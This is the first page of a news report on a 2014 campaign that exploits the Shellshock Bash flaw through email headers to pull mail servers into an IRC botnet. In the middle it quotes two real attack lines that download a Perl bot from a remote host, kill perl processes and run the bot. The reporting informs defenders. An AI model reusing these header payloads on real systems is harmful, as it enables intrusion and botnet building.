Subscribe / Unsubscribe Enewsletters | Login | Register

Pencil Banner

Report: Criminals use Shellshock against mail servers to build botnet

Steve Ragan | Oct. 28, 2014
Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.

Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.

When it was disclosed in September, Shellshock — the common name given to a vulnerability in Bash that enables command execution — impacted systems both large and small, creating ripples across the tech industry.

Vendors struggled to release and maintain patches. For several days after the initial disclosure, researchers found ways to bypass the fixes, leading to the publication of four additional CVE advisories related to the main flaw.

It didn't take long, days in fact, before criminals latched on to the issue. On September 27, researchers at FireEye released details on a number of proof-of-concept scripts related to Shellshock.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote at the time.

How right they were. Among the findings from FireEye was a proof-of-concept script that created an IRC-based (Internet Relay Chat) botnet, capable of sending spam, initiating a DDoS attack, or performing remote command execution on the compromised host.

On Friday, CSO became aware of a Shellshock-based campaign targeting organizations in Europe and the United States. It spreads via email, using Shellshock exploitation code in the message header fields. If successful, it delivers a simple Perl script as the payload, which adds the host to a botnet commanded form IRC.

Subsequent investigation by CSO led to the discovery of one the IRC servers used to host the bots. Connected to this server was more than 160 compromised hosts as of October 24.

THE MESSAGE:

The Shellshock campaign targets mail servers, searching for vulnerable MTAs / MDAs. The messages themselves are blank, but the code needed to exploit the Shellshock vulnerability is placed into the message's headers.

The person(s) behind the spam blasts are including the following code in several message fields, including the "To:" field, "From:" field, "Subject" field, "Date:" field, "Message ID:" and others.

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

A full list of the fields, with examples, are available here.

A sample of one of the email messages - complete with headers - is available here, thanks to Benjamin Sonntag, the co-founder of citizen advocacy group La Quadrature du Net.

THE SERVER:

The IRC server identified by CSO is just one of several. It's installed on a previously compromised Web server that exists on the OVH network, and is maintained by a French IT firm focusing network integration and information security.

 

1  2  3  Next Page 

Sign up for CIO Asia eNewsletters.